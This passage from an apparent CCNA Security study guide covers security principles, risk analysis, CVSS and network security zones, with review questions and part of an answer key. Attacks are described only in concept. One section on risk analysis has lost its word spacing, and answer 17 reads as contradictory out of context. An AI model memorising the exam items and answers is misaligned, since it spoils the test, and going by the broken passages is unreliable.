10. C. With proper input validation, a buffer overflow attack will cause an access violation. Without proper input validation, the allocated space will be exceeded, and the data at the bottom of the memory stack will be overwritten.
11. C. One of the ways a man-in-the-middle attack is accomplished is by poisoning the ARP cache on a switch. The attacker accomplishes this poisoning by answering ARP requests for another computer's IP address with his own MAC address. Once the ARP cache has been successfully poisoned, when ARP resolution occurs, both computers will have the attacker's MAC address listed as the MAC address that maps to the other computer's IP address. As a result, both are sending to the attacker, placing him "in the middle."
12. B. An advertisement would be publicly available.
13. A. The best countermeasure against social engineering threats is to provide user security awareness training. This training should be required and must occur on a regular basis because social engineering techniques evolve constantly.
14. B. Dynamic ARP inspection (DAI) is a security feature that intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table.
15. B. One of the issues with substitution ciphers is that if the message is of sufficient length, patterns in the encryption begin to become noticeable, which makes it vulnerable to a frequency attack. A frequency attack is when the attacker uses these recurring patterns to reverse engineer the message.
16. C. To calculate the number of keys that would be needed in this example, you would use the following formula:
# of users × (# of users – 1) / 2
Using our example, you would calculate 5 × (4) / 2 or 10 needed keys.
17. B. Asymmetric encryption is more expensive than symmetric, it is slower than symmetric, it is easier to crack than symmetric, and key compromise can occur less easily than with symmetric.
18. A. Only RC4 is a stream cipher.
19. B. Some modes of symmetric key algorithms use initialization vectors (IVs) to ensure that patterns are not produced during encryption. These IVs provide this service by using random values with the algorithms.
20. B. A router ID is not a part of the configuration.
21. C. Privilege levels allow you to assign a technician sets of activities that coincide with the level they have been assigned. There are 16 levels from 0 to 15.
22. B. The IOS Resilient Configuration feature can provide a way to easily recover from an attack on the configuration, and it can also help to recover from an even worse attack in which the attacker deletes not only the startup configuration but also the boot image.
23. B. A key chain can be used to hold multiple keys if required.
24. C. When a malicious individual introduces a rogue switch to the switching network and the rogue switch has a superior BPDU to the one held by the current root bridge, the new switch assumes the position of root bridge.
25. A. Gratuitous ARP is called gratuitous because the ARP message sent is an answer to a question that the target never asks, and it causes the target to change its ARP cache.
26. C. The result of this attack is that the attacker is now able to receive traffic that he would not have been able to see otherwise because in this condition the switch is basically operating as a hub and not a switch.
27. B. DHCP snooping is implemented on the switches in the network, so it is a Layer 2 solution. The switch ports on the switch are labeled either trusted or untrusted. Trusted ports are those that will allow a DHCP message to traverse.
28. C. Without executing this command, the other commands will have no effect.
29. B. The BPDU Guard feature is designed to prevent the reception of superior BPDUs on access ports by preventing the reception of any BPDU frames on access ports.
30. Spanning Tree Protocol (STP) prevents switching loops in redundant switching networks.
Chapter 1 Understanding Security Fundamentals
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
1.1 Common security principles
Describe confidentiality, integrity, availability (CIA)
Identify common security terms
Identify common network security zones
1.4 Describe network topologies
Campus area network (CAN)
Cloud, wide area network (WAN)
Data center
Small office/home office (SOHO)
Network security for a virtual environment
Securing a network is no easy task. Daily you probably hear about data disclosures and new network attacks. However, you are not defenseless. By properly implementing the security features available in Cisco routers, switches, and firewalls, you can reduce the risk of a security breach to a manageable level. This book is designed to help you understand the issues, identify your security options, and deploy those options in the correct manner. In the process, the book will prepare you for the Cisco CCNA Security certification, which validates the skills and knowledge required to secure a network using Cisco products.
In this chapter, you will learn the following:
Common security principles
Network topologies
Goals of Security
When you're securing a network, several important security principles should guide your efforts. Every security measure you implement should contribute to the achievement of one of three goals. The three fundamentals of security are confidentiality, integrity, and availability (CIA), often referred to as the CIA triad.
Most security issues result in a violation of at least one facet of the CIA triad. Understanding these three security principles will help ensure that the security controls and mechanisms implemented protect at least one of these principles.
Every security control that is put into place by an organization fulfills at least one of the security principles of the CIA triad. Understanding how to circumvent these security principles is just as important as understanding how to provide them.
Confidentiality
To ensure confidentiality, you must prevent the disclosure of data or information to unauthorized entities. As part of confidentiality, the sensitivity level of data must be determined before putting any access controls in place. Data with a higher sensitivity level will have more access controls in place than data at a lower sensitivity level. Identification, authentication, and authorization can be used to maintain data confidentiality. Encryption is another popular example of a control that provides confidentiality.
Integrity
Integrity, the second part of the CIA triad, ensures that data is protected from unauthorized modification or data corruption. The goal of integrity is to preserve the consistency of data, including data stored in files, databases, systems, and networks.
An access control list (ACL) is an example of a control that helps to provide integrity. Another example is the generation of hash values that can be used to validate data integrity.
Availability
Availability means ensuring that data is accessible when and where it is needed. Only individuals who need access to data should be allowed access to that data. The two main areas where availability is affected are
When attacks are carried out that disable or cripple a system.
When service loss occurs during and after disasters. Each system should be assessed on its criticality to organizational operations. Controls are implemented based on each system's criticality level.
Fault-tolerant technologies, such as RAID or redundant sites, are examples of controls that help to improve availability.
Guiding Principles
When managing network security and access to resources, there are some proven principles that should guide your efforts. These concepts have stood the test of time because they contribute to supporting the CIA triad.
Least Privilege/Need-to-Know
The principle of least privilege requires that a user or process is given only the minimum access privilege needed to perform a particular task. Its main purpose is to ensure that users only have access to the resources they need and are authorized to perform only the tasks they need to perform. To properly implement the least privilege principle, organizations must identify all users' jobs and restrict users only to the identified privileges.
The need-to-know principle is closely associated with the concept of least privilege. Although least privilege seeks to reduce access to a minimum, the need-to-know principle actually defines what the minimums for each job or business function are. Excessive privileges become a problem when a user has more rights, privileges, and permissions than he needs to do his job. Excessive privileges are hard to control in large environments.
A common implementation of the least privilege and need-to-know principles is when a systems administrator is issued both an administrative-level account and a normal user account. In most day-to-day functions, the administrator should use his normal user account. When the systems administrator needs to perform administrative-level tasks, he should use the administrative-level account. If the administrator uses his administrative-level account while performing routine tasks, he risks compromising the security of the system and user accountability.
Organizational rules that support the principle of least privilege include the following:
Keep the number of administrative accounts to a minimum.
Administrators should use normal user accounts when performing routine operations.
Permissions on tools that are likely to be used by attackers should be as restrictive as possible.
To more easily support the least privilege and need-to-know principles, users should be divided into groups to facilitate the confinement of information to a single group or area. This process is referred to as compartmentalization.
Default to No Access
During the authorization process, you should configure an organization's access control mechanisms so that the default level of security is to default to no access. This means that if nothing has been specifically allowed for a user or group, then the user or group will not be able to access the resource. The best security approach is to start with no access and add rights based on a user's need to know and least privilege needed to accomplish daily tasks.
Defense in Depth
A defense-in-depth strategy refers to the practice of using multiple layers of security between data and the resources on which it resides and possible attackers. The first layer of a good defense-in-depth strategy is appropriate access control strategies. Access controls exist in all areas of an information systems (IS) infrastructure (more commonly referred to as an IT infrastructure), but a defense-in-depth strategy goes beyond access control. It also considers software development security, cryptography, and physical security. Figure 1.1 shows an example of the defense-in-depth concept.
FIGURE 1.1 Defense in depth
Separation of Duties
Separation of duties is a preventive administrative control to keep in mind when designing an organization's authentication and authorization policies. Separation of duties prevents fraud by distributing tasks and their associated rights and privileges between more than one user. It helps to deter fraud and collusion because when an organization implements adequate separation of duties, collusion between two or more personnel would be required to carry out fraud against the organization. A good example of separation of duties is authorizing one person to manage backup procedures and another to manage restore procedures.
Separation of duties is associated with dual controls and split knowledge. With dual controls, two or more users are authorized and required to perform certain functions. For example, a retail establishment might require two managers to open the safe. Split knowledge ensures that no single user has all the information to perform a particular task. An example of a split control is the military requiring two individuals to each enter a unique combination to authorize missile firing.
Separation of duties ensures that one person is not capable of compromising organizational security. Any activities that are identified as high risk should be divided into individual tasks, which can then be allocated to different personnel or departments.
Let's look at an example of the violation of separation of duties. An organization's internal audit department investigates a possible breach of security. One of the auditors interviews three employees.
A clerk who works in the accounts receivable office and is in charge of entering data into the finance system
An administrative assistant who works in the accounts payable office and is in charge of approving purchase orders
The finance department manager who can perform the functions of both the clerk and the administrative assistant
To avoid future security breaches, the auditor should suggest that the manager should only be able to review the data and approve purchase orders.
Job Rotation
From a security perspective, job rotation refers to the detective administrative control where multiple users are trained to perform the duties of a position to help prevent fraud by any individual employee. The idea is that by making multiple people familiar with the legitimate functions of the position, the likelihood increases that unusual activities by any one person will be noticed. Job rotation is often used in conjunction with mandatory vacations. Beyond the security aspects of job rotation, additional benefits include the following:
Trained backup in case of emergencies
Protection against fraud
Cross-training of employees
Mandatory Vacation
With mandatory vacations, all personnel are required to take time off, allowing other personnel to fill their positions while gone. This detective administrative control enhances the opportunity to discover unusual activity.
Some of the security benefits of using mandatory vacations include having the replacement employee do the following:
Run the same applications as the vacationing employee
Perform tasks in a different order from the vacationing employee
Perform the job from a different workstation than the vacationing employee
Replacement employees should avoid running scripts that were created by the vacationing employee. A replacement employee should either develop their own script or manually complete the tasks in the script.
Common Security Terms
The risk management process cannot be discussed without understanding some key terms used in risk management. Security professionals should become familiar with the following terms as they are used in risk management:
Assets include anything that is of value to the organization. Assets can be physical such as buildings, land, and computers, and they can be intangible such as data, plans, and recipes.
A vulnerability is an absence or weakness of a countermeasure that is in place. Vulnerabilities can occur in software, hardware, or personnel. An example of a vulnerability is unrestricted access to a folder on a computer. Most organizations implement a vulnerability assessment to identify vulnerabilities.
A threat is the next logical progression in risk management. A threat occurs when a vulnerability is identified or exploited. A threat would occur when an attacker identified the folder on the computer that has an inappropriate or absent ACL.
A threat agent is something that carries out a threat. Continuing with the example, the attacker who takes advantage of the inappropriate or absent ACL is the threat agent. Keep in mind, though, that threat agents can discover and/or exploit vulnerabilities. Not all threat agents will actually exploit an identified vulnerability.
A risk is the probability that a threat agent will exploit a vulnerability and the impact if the threat is carried out. The risk in the vulnerability example would be fairly high if the data residing in the folder is confidential. However, if the folder contains only public data, then the risk would be low. Identifying the potential impact of a risk often requires security professionals to enlist the help of subject-matter experts.
An exposure occurs when an organizational asset is exposed to losses. If the folder with the inappropriate or absent ACL is compromised by a threat agent, the organization is exposed to the possibility of data exposure and loss.
A countermeasure reduces the potential risk. Countermeasures are also referred to as safeguards or controls. Three things must be considered when implementing a countermeasure: vulnerability, threat, and risk. For this example, a good countermeasure would be to implement the appropriate ACL and to encrypt the data. The ACL protects the integrity of the data, and the encryption protects the confidentiality of the data.
Countermeasures or controls come in many categories and types. The categories and types of controls are discussed later in this chapter.
All the aforementioned security concepts work together in the relationship demonstrated in Figure 1.2.
FIGURE 1.2 Security cycle
Risk Management Process
The risk management process is composed of a series of operations in which the data from one operation feeds the next operation. According to NIST SP 800-30, common information-gathering techniques used in risk analysis include automated risk assessment tools, questionnaires, interviews, and policy document reviews. Keep in mind that multiple sources should be used to determine the risks to a single asset. NIST SP 800-30 identifies the following steps in the risk management process:
1. Identify the assets and their value.
2. Identify threats.
3. Identify vulnerabilities.
4. Determine likelihood.
5. Identify impact.
6. Determine risk as a combination of likelihood and impact.
The following sections include these processes and two additional ones that relate to the identification of countermeasures and cost-benefit analysis.
Asset Classification
The first step of any risk assessment is to identify the assets and determine the asset value, called asset classification. Assets are both tangible and intangible. Tangible assets include computers, facilities, supplies, and personnel. Intangible assets include intellectual property, data, and organizational reputation. The value of an asset should be considered in respect to the asset owner's view. The six following considerations can be used to determine the asset's value:
Value to owner
Work required to develop or obtain the asset
Costs to maintain the asset
Damage that would result if the asset were lost
Cost that competitors would pay for the asset
Penalties that would result if the asset was lost
After determining the value of the assets, you should determine the vulnerabilities and threats to each asset.
Data Assets
Data should be classified based on its value to the organization and its sensitivity to disclosure. Assigning a value to data allows an organization to determine the resources that should be used to protect the data. Resources that are used to protect data include personnel resources, monetary resources, access control resources, and so on. Classifying data allows you to apply different protective measures. Data classification is critical to all systems to protect the confidentiality, integrity, and availability of data.
After data is classified, the data can be segmented based on its level of protection needed. The classification levels ensure that data is handled and protected in the most cost-effective manner possible. An organization should determine the classification levels it uses based on the needs of the organization. Several commercial business and military and government information classifications are commonly used.
The information life cycle should also be based on the classification of the data. Organizations are required to retain certain information, particularly financial data, based on local, state, or government laws and regulations.
In this section, we will discuss the sensitivity and criticality of data, commercial business classifications, military and government classifications, information life cycle, database maintenance, and data audit.
SENSITIVITY AND CRITICALITY
Sensitivity is a measure of how freely the data can be handled. Some data requires special care and handling, especially when inappropriate handling could result in penalties, identity theft, financial loss, invasion of privacy, or unauthorized access by an individual or many individuals. Some data is also subject to regulation by state or federal laws and requires notification in the event of a disclosure.
Data is assigned a level of sensitivity based on who should have access to it and how much harm would be done if it were disclosed. This assignment of sensitivity is called data classification.
Criticality is a measure of the importance of the data. Data considered sensitive may not necessarily be considered critical. Assigning a level of criticality to a particular data set must take into consideration the answers to a few questions:
Will you be able to recover the data in case of disaster?
How long will it take to recover the data?
What is the effect of this downtime, including loss of public standing?
Data is considered essential when it is critical to the organization's business. When essential data is not available, even for a brief period of time, or its integrity is questionable, the organization will be unable to function. Data is considered required when it is important to the organization, but organizational operations would continue for a predetermined period of time even if the data is not available. Data is nonessential if the organization is able to operate without it during extended periods of time.
Once the sensitivity and criticality of data is understood and documented, the organization should then work to create a data classification system. Most organizations will use either a commercial business classification system or a military and government classification system.
COMMERCIAL BUSINESS CLASSIFICATIONS
Commercial businesses usually classify data using four main classification levels, listed from highest sensitivity level to lowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Data that is confidential includes trade secrets, intellectual data, application programming code, and other data that could seriously affect the organization if unauthorized disclosure occurred. Data at this level would be available only to personnel in the organization whose work relates to the data's subject. Access to confidential data usually requires authorization for each access. Confidential data is exempt from disclosure under the Freedom of Information Act. In most cases, the only way for external entities to have authorized access to confidential data is as follows:
After signing a confidentiality agreement
When complying with a court order
As part of a government project or contract procurement agreement
Data that is private includes any information related to personnel, including human resource records, medical records, and salary information, that is used only within the organization. Data that is sensitive includes organizational financial information and requires extra measures to ensure its CIA and accuracy. Public data is data that would not cause a negative impact on the organization.
MILITARY AND GOVERNMENT CLASSIFICATIONS
Military and governmental entities usually classify data using five main classification levels, listed from highest sensitivity level to lowest:
1. Top secret
2. Secret
3. Confidential
4. Sensitive but unclassified
5. Unclassified
Data that is top secret includes weapon blueprints, technology specifications, spy satellite information, and other military information that could gravely damage national security if disclosed. Data that is secret includes deployment plans, missile placement, and other information that could seriously damage national security if disclosed. Data that is confidential includes patents, trade secrets, and other information that could seriously affect the government if unauthorized disclosure occurred. Data that is sensitive but unclassified includes medical or other personal data that might not cause serious damage to national security but could cause citizens to question the reputation of the government. Military and government information that does not fall into any of the other four categories is considered unclassified and usually has to be granted to the public based on the Freedom of Information Act.
OTHER CLASSIFICATION SYSTEMS
Another classification system created by the United Kingdom's National Infrastructure Security Coordination Centre (NISCC, now Centre for Protection of National Infrastructure) and since adopted by the ISO/IEC as part of the Standard on Information security management for inter-sector and inter-organizational communications and by CERT is the Traffic Light Protocol (TLP). This system uses traffic light colors to classify information assets. Table 1.1 shows the four colors and their meanings.
TABLE 1.1 TLP classifications
Color   Meaning
Red     Shared only within a meeting
Amber   Shared only with those in the organization with a need to know
Green   Shared only within a community
White   No restriction but still subject to copyright rules
Vulnerability Identification
When identifying vulnerabilities, the Common Vulnerability Scoring System and the Security Content Automation Protocol are standards used in this process. In this section, you'll learn about these two methods for enumerating vulnerabilities in a common format.
Security Content Automation Protocol (SCAP) is a standard used by the security automation community to enumerate software flaws and configuration issues. It standardized the nomenclature and formats used. A vendor of security automation products can obtain a validation against SCAP, demonstrating that it will interoperate with other scanners and express the scan results in a standardized way.
Understanding the operation of SCAP requires an understanding of its components.
Common Configuration Enumeration (CCE) These are configuration best-practice statements maintained by NIST.
Common Platform Enumeration (CPE) These are methods for describing and classifying operating systems, applications, and hardware devices.
Common Weakness Enumeration (CWE) These are design flaws in the development of software that can lead to vulnerabilities.
Common Vulnerabilities and Exposures (CVE) These are vulnerabilities in published operating systems and applications software.
The Common Vulnerability Scoring System (CVSS) is a system of ranking vulnerabilities that are discovered based on predefined metrics. This system ensures that the most critical vulnerabilities can be easily identified and addressed after a vulnerability test is met. Scores are awarded on a scale of 0 to 10, with the values having the following ranks:
0: No issues
0.1 to 3.9: Low
4.0 to 6.9: Medium
7.0 to 8.9: High
9.0 to 10.0: Critical
CVSS is composed of three metric groups. These metric groups are described as follows:
Base includes characteristics of a vulnerability that are constant over time and user environments.
Temporal includes characteristics of a vulnerability that change over time but not among user environments.
Environmental includes characteristics of a vulnerability that are relevant and unique to a particular user's environment.
The base metric group includes the following metrics:
Access vector (AV) describes how the attacker would exploit the vulnerability and has three possible values.
L stands for Local and means that the attacker must have physical or logical access to the affected system.
A stands for Adjacent network and means that the attacker must be on the local network.
N stands for Network and means that the attacker can cause the vulnerability from any network.
Access complexity (AC) describes the difficulty of exploiting the vulnerability and has three possible values.
H stands for High and means that the vulnerability requires special conditions that are hard to find.
M stands for Medium and means that the vulnerability requires somewhat special conditions.
L stands for Low and means that the vulnerability does not require special conditions.
Authentication (Au) describes the authentication an attacker would need to get through to exploit the vulnerability and has three possible values.
M stands for Multiple and means that the attacker would need to get through two or more authentication mechanisms.
S stands for Single and means that the attacker would need to get through one authentication mechanism.
N stands for None and means that no authentication mechanisms are in place to stop the exploit of the vulnerability.
Availability (A) describes the disruption that might occur if the vulnerability is exploited and has three possible values.
N stands for None and means that there is no availability impact.
P stands for Partial and means that system performance is degraded.
C stands for Complete and means that the system is completely shut down.
Confidentiality (C) describes the information disclosure that may occur if the vulnerability is exploited and has three possible values.
N stands for None and means that there is no confidentiality impact.
P stands for Partial and means some access to information would occur.
C stands for Complete and means all information on the system could be compromised.
Integrity (I) describes the type of data alteration that might occur and has three possible values.
N stands for None and means that there is no integrity impact.
P stands for Partial and means some information modification would occur.
C stands for Complete and means all information on the system could be compromised.
The CVSS vector will look something like this:
CVSS2#AV:L/AC:H/Au:M/C:P/I:N/A:N
This vector is read as follows:
AV:L
Access Vector: L stands for Local and means that the attacker must have physical or logical access to the affected system.
AC:H
Access Complexity: H stands for High and means that the vulnerability requires special conditions that are hard to find.
Au:M
Authentication: M stands for Multiple and means that the attacker would need to get through two or more authentication mechanisms.
C:P
Confidentiality: P stands for Partial and means some access to information would occur.
I:N
Integrity: N stands for None and means that there is no integrity impact.
A:N
Availability: N stands for None and means that there is no availability impact.
ControlSelectionOncetheassetshavebeenclassifiedandtheirvaluedeterminedandallvulnerabilitieshavebeenidentified,controlsormitigationsmustbeselectedtoaddressthevulnerabilities.Thiscannotbedoneuntilthelevelofriskassociatedwitheachvulnerabilityhasbeendetermined
throughoneoftwomethods,qualitativeandquantitativeriskassessment.
QualitativeRiskAnalysisQualitativeriskanalysisdoesnotassignmonetaryandnumericvaluestoallfacetsoftheriskanalysisprocess.Qualitativeriskanalysistechniquesincludeintuition,experience,andbest-practicetechniques,suchasbrainstorming,focusgroups,surveys,questionnaires,meetings,interviews,andDelphi.Althoughallofthesetechniquescanbeused,mostorganizationswilldeterminethebesttechnique(ortechniques)basedonthethreatstobeassessed.Experienceandeducationonthethreatsareneeded.
Eachmemberofthegroupwhohasbeenchosentoparticipateinthequalitativeriskanalysisusestheirexperiencetorankthelikelihoodofeachthreatandthedamagethatmightresult.Aftereachgroupmemberranksthethreatpossibility,losspotential,andsafeguardadvantage,dataiscombinedinareporttopresenttomanagement.Alllevelsofstaffshouldberepresentedaspartofthequalitativeriskanalysis,butitisvitalthatsomeparticipantsinthisprocessshouldhavesomeexpertiseinriskanalysis.
QuantitativeRiskAnalysisAquantitativeriskanalysisassignsmonetaryandnumericvaluestoallfacetsoftheriskanalysisprocess,includingassetvalue,threatfrequency,vulnerabilityseverity,impact,safeguardcosts,andsoon.Equationsareusedtodeterminetotalandresidualrisks.Themostcommonequationsareforsinglelossexpectancy(SLE)andannuallossexpectancy(ALE).
TheSLEisthemonetaryimpactofeachthreatoccurrence.TodeterminetheSLE,youmustknowtheassetvalue(AV)andtheexposurefactor(EF).TheEFisthepercentvalueorfunctionalityofanassetthatwillbelostwhenathreateventoccurs.ThecalculationforobtainingtheSLEisasfollows:
SLE=AV×EF
Forexample,anorganizationhasawebserverfarmwithanAVof$10,000.Iftheriskassessmenthasdeterminedthatapowerfailureisathreatagentforthewebserverfarmandtheexposurefactorforapowerfailureis25percent,theSLEforthiseventequals$2,500.
Theannuallossexpectancy(ALE)istheexpectedriskfactorofanannualthreatevent.TodeterminetheALE,youmustknowtheSLEandtheannualizedrateofoccurrence(ARO).TheAROistheestimateofhowoftenagiventhreatmightoccurannually.ThecalculationforobtainingtheALEisasfollows:
ALE=SLE×ARO
Usingthepreviouslymentionedexample,iftheriskassessmenthasdeterminedthattheAROforthepowerfailureofthewebserverfarmis50percent,theALEforthiseventequals$1,250.
Cost-BenefitAnalysis
UsingtheALE,theorganizationcandecidewhethertoimplementcontrols.IftheannualcostofthecontroltoprotectthewebserverfarmismorethantheALE,theorganizationcouldeasilychoosetoaccepttheriskbynotimplementingthecontrol.IftheannualcostofthecontroltoprotectthewebserverfarmislessthantheALE,theorganizationshouldconsiderimplementingthecontrol.
Handling Risk
Risk reduction is the process of altering elements of the organization in response to risk analysis. After an organization understands its total and residual risk, it must determine how to handle the risk. The following four basic methods are used to handle risk:
Avoidance Terminating the activity that causes a risk or choosing an alternative that is not as risky
Transfer Passing the risk on to a third party, including insurance companies
Mitigation Defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Acceptance Understanding and accepting the level of risk as well as the cost of damages that can occur
Network Topologies
Understanding the types of network topologies that you may see will help you appreciate some of the security measures called for in various scenarios. In this section, you'll learn about some topologies that may exist in your organization.
CAN
The campus area network (CAN) comprises the part of the network where data, services, and connectivity to the outside world are provided to those who work in the corporate office or headquarters. It can be further subdivided into the following:
Enterprise core connects the enterprise campus and the intranet data center.
Enterprise campus includes the end devices and provides them access to the outside world and to the intranet data center through the enterprise core.
Intranet data center includes the data center where resources are made available to the enterprise campus and to branch offices through the enterprise core.
Figure 1.3 shows the components of the CAN. It includes two parts that are not part of the enterprise campus (WAN edge and Internet edge) that comprise the networks that are used to connect to the outside world.
FIGURE 1.3 Campus area network
Security issues in the enterprise core include the following:
Service disruptions (denial of service [DoS], distributed denial of service [DDoS])
Unauthorized access (intrusions, routing protocol attacks)
Data leaks and data modifications (packet sniffing, man in the middle [MITM] attacks)
Security issues in the enterprise campus include the following:
Service disruptions (botnets, malware, DoS)
Unauthorized access (intrusions, IP spoofing)
Data leaks and data modifications (packet sniffing, MITM attacks)
Identity theft and fraud (phishing, email spam)
Security issues in the intranet data center include the following:
Unauthorized access (device access, data access, privilege escalation)
Service disruptions (botnets, DoS)
Data leaks and data modifications (MITM, malware, scripting, SQL attacks)
WAN
The WAN connection of the organization is called the enterprise WAN edge in the Cisco network model. It is one of two modules that are used to connect the CAN to the outside world, the other being the enterprise Internet edge (shown in Figure 1.3). This comprises the provisioned WAN connections to other offices.
Security issues in the enterprise WAN edge include the following:
Malicious branch client activity (malware, Trojans, botnets)
Transmission threats (MITM, sniffing)
Infrastructure attacks (reconnaissance, DoS, service attacks)
Data Center
While the data center may be located in the campus area network, it may also be located in the cloud. The introduction of cloud environments brings many benefits, but it also brings security threats. These threats include the following:
Account or service hijacking
Data loss
Improper device hardening and patching
DoS attacks
Insecure APIs and user interfaces
Malicious provider insiders
Improper access from other tenants
SOHO
Many of today's workers operate from home rather than in the main office or headquarters. Other users will be operating from smaller branch offices. When this is the case, the small office/home office (SOHO) network will connect to the main office via the WAN edge module in cases where the connection is provisioned and via the Internet edge module when the connection leverages the Internet (such as a VPN connection). These two edge modules were shown in Figure 1.3. Since this module interfaces with those two modules, the security issues in the SOHO network will be the same as those present in the Internet edge and WAN edge modules.
Virtual
Today's data centers are increasingly moving to a virtual environment. When a virtual environment is present, it may reside in the campus data center, or it may reside in a cloud data center. Also, it is not unusual to find that the organization has both a physical data center and a virtual data center. Regardless of the exact configuration, there are challenges to securing a virtual environment.
In a virtual environment there are two traffic pathways, one that is used within the virtual environment and one used between the virtual environment and the physical environment. Physical security devices cannot be used to enforce security on the traffic that never leaves a physical host (traffic between VMs located on the same host) or on traffic that never leaves the virtual environment (traffic between VMs on different hosts). The solution is the deployment of virtual security devices such as the Cisco ASAv firewall, the Cisco CSR 1000v router, and the Cisco Nexus 1000v switch.
Common Network Security Zones
One of the most basic design principles for a secure network calls for creating security zones. These are logical divisions of the network with access controls applied to control traffic between the zones. By organizing resources in these zones and applying the proper access controls, you can reduce the possibility that unauthorized access to data is allowed. In this section, you'll explore four common security zones.
DMZ
A demilitarized zone (DMZ) is an area where you can place a public server for access by people you might not trust otherwise. By isolating a server in a DMZ, you can hide or remove access to other areas of your network. You can still access the server using your network, but others aren't able to access further network resources. This can be accomplished using firewalls to isolate your network.
When establishing a DMZ, you assume that the person accessing the resource isn't necessarily someone you would trust with other information. By keeping the rest of the network from being visible to external users, this lowers the threat of intrusion in the internal network.
Any time you want to separate public information from private information, a DMZ is an acceptable option.
The easiest way to create a DMZ is to use a firewall that can transmit in these three directions:
To the internal network
To the external world (Internet)
To the public information you're sharing (the DMZ)
From there, you can decide what traffic goes where; for example, HTTP traffic would be sent to the DMZ, and email would go to the internal network.
Intranet and Extranet
While DMZs are often used to make assets publicly available, extranets are used to make data available to a smaller set of the public—for example, a partner organization. Intranet is a term to describe the interior LAN; an extranet is a network logically separate from the intranet, the Internet, and the DMZ (if both exist in the design), where resources that will be accessed from the outside world are made available. Access may be granted to customers, business partners, and the public in general. All traffic between this network and the intranet should be closely monitored and securely controlled. Nothing of a sensitive nature should be placed in the extranet.
Public and Private
The purpose of creating security zones such as DMZs is to separate sensitive assets from those that require less protection. Because the goals of security and of performance and ease of use are typically mutually exclusive, not all networks should have the same levels of security.
Information that is of a public nature, or that you otherwise deem not to be of a sensitive nature, can be located in any of the zones you create. However, you should ensure that private corporate data and especially personally identifiable information (PII)—information that can be used to identify an employee or customer and perhaps steal their identity—is located only in secure zones and never in the DMZ or the extranet.
VLAN
Network security zones can also be created at layer 2. Virtual local area networks (VLANs) are logical subdivisions of a switch that segregate ports from one another as if they were in different LANs. VLANs offer another way to add a layer of separation between sensitive devices and the rest of the network. For example, if only one device should be able to connect to the finance server, the device and the finance server could be placed in a VLAN separate from the other VLANs. As traffic between VLANs can occur only through a router, ACLs can be used to control the traffic allowed between VLANs.
These VLANs can also span multiple switches, meaning that devices connected to switches in different parts of a network can be placed in the same VLAN regardless of physical location.
Summary
This chapter covered common security principles such as the CIA triad, the goals of which should guide all security initiatives. It also discussed common security terms such as risk, vulnerability, and threat, as well as the proper application of common security zones, such as intranet, DMZ, and extranets. This chapter also discussed network topologies as seen from the perspective of the Cisco campus area network. Finally, the chapter discussed other methods of network segmentation such as VLANs.
Exam Essentials
Describe the CIA triad. Every security measure you implement should contribute to the achievement of one of three goals. The three fundamentals of security are confidentiality, integrity, and availability (CIA), often referred to as the CIA triad.
Define important security terms. Security professionals should become familiar with terms such as assets, vulnerabilities, threats, threat agent, risk, exposure, and countermeasures.
Identify common security zones. Describe intranet, extranet, DMZ, and the Internet. Explain their proper use.
Describe common network topologies. Explain various topologies as seen from the perspective of the Cisco campus area network such as the enterprise core, enterprise campus, intranet data center, WAN edge, and Internet edge. Describe the common security issues found in each.
Review Questions
1. Which of the following is not one of the CIA triad?
A. Confidentiality
B. Integrity
C. Availability
D. Accountability
2. Which of the following requires that a user or process is given only the minimum access privilege needed to perform a particular task?
A. Least privilege
B. Separation of duties
C. Job rotation
D. Mandatory vacation
3. Which of the following occurs when a vulnerability is identified or exploited?
A. Risk
B. Threat
C. Exposure
D. Countermeasure
4. According to NIST SP 800-30, what is the first step in the risk management process?
A. Identify threats
B. Identify impact
C. Identify vulnerabilities
D. Identify the assets and their value
5. Which of the following is a measure of how freely data can be handled?
A. Criticality
B. Sensitivity
C. Integrity
D. Value
6. Which of the following is not a typical commercial data classification level?
A. Sensitive
B. Confidential
C. Secret
D. Public
7. Which of the following represents data shared only within a meeting in the TLP system?
A. Amber
B. White
C. Red
D. Green
8. Which of the following is a standard used by the security automation community to enumerate software flaws and configuration issues?
A. TLP
B. CIA
C. SCAP
D. CAN
9. Which of the following is not a metric group in the Common Vulnerability Scoring System?
A. Base
B. Access vector
C. Temporal
D. Environmental
10. Which of the following is the monetary impact of each threat occurrence?
A. ALE
B. AV
C. ARO
D. SLE
11. Which method of handling risk involves defining the acceptable risk level the organization can tolerate and reducing the risk to that level?
A. Avoidance
B. Mitigation
C. Acceptance
D. Transfer
12. What part of the campus area network includes the end devices and provides them with access to the outside world and to the intranet data center through the enterprise core?
A. Intranet data center
B. Enterprise campus
C. Enterprise core
D. Enterprise WAN edge
13. Which of the following is an area where you can place a public server for access by anyone?
A. Intranet
B. DMZ
C. Internet
D. Extranet
14. Which of the following is a logical subdivision of a switch that segregates ports from one another?
A. VLAN
B. VPN
C. DMZ
D. STP
15. Which of the following refers to the data being unaltered by unauthorized individuals?
A. Confidentiality
B. Integrity
C. Availability
D. Accountability
16. Which of the following refers to the practice of using multiple layers of security between data and the resources on which it resides and possible attackers?
A. Default to no access
B. Defense in depth
C. Separation of duties
D. Job rotation
17. Which of the following is the probability that a threat agent will exploit a vulnerability and the impact if the threat is carried out?
A. Risk
B. Threat
C. Exposure
D. Countermeasure
18. Which of the following is a system that uses traffic light colors to classify information assets?
A. DLP
B. VLAN
C. TLP
D. VTP
19. Which component of SCAP refers to vulnerabilities in published operating systems and applications software?
A. CWE
B. CVE
C. CCE
D. CPE
20. Which of the following is the percent value or functionality of an asset that will be lost when a threat event occurs?
A. SLE
B. AV
C. EF
D. ALE
Chapter 2
Understanding Security Threats
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
1.2 Common security threats
Identify common network attacks
Describe social engineering
Identify malware
Classify the vectors of data loss/exfiltration
To secure a network, you must have a clear understanding of the threats that the network faces. These threats come from all sorts of sources and have a variety of goals. In this chapter, you will continue your investigation of common security threats and their associated threat vectors.
In this chapter, you will learn the following:
Common security threats
Common Network Attacks
While new attacks and new motivations for those attacks seem to be arriving almost daily, there are some common attacks and common motivations for those attacks. In this chapter, you'll first learn about common motivations for attacks and common attack vectors that are simply various ways in which the attacks are implemented. Following that, you'll learn about some specific attacks that are quite common.
Motivations
Hackers hack for many different reasons. When you really get down to it, they want one of four things:
Financial gain
Disruption
Geopolitical change
Notoriety
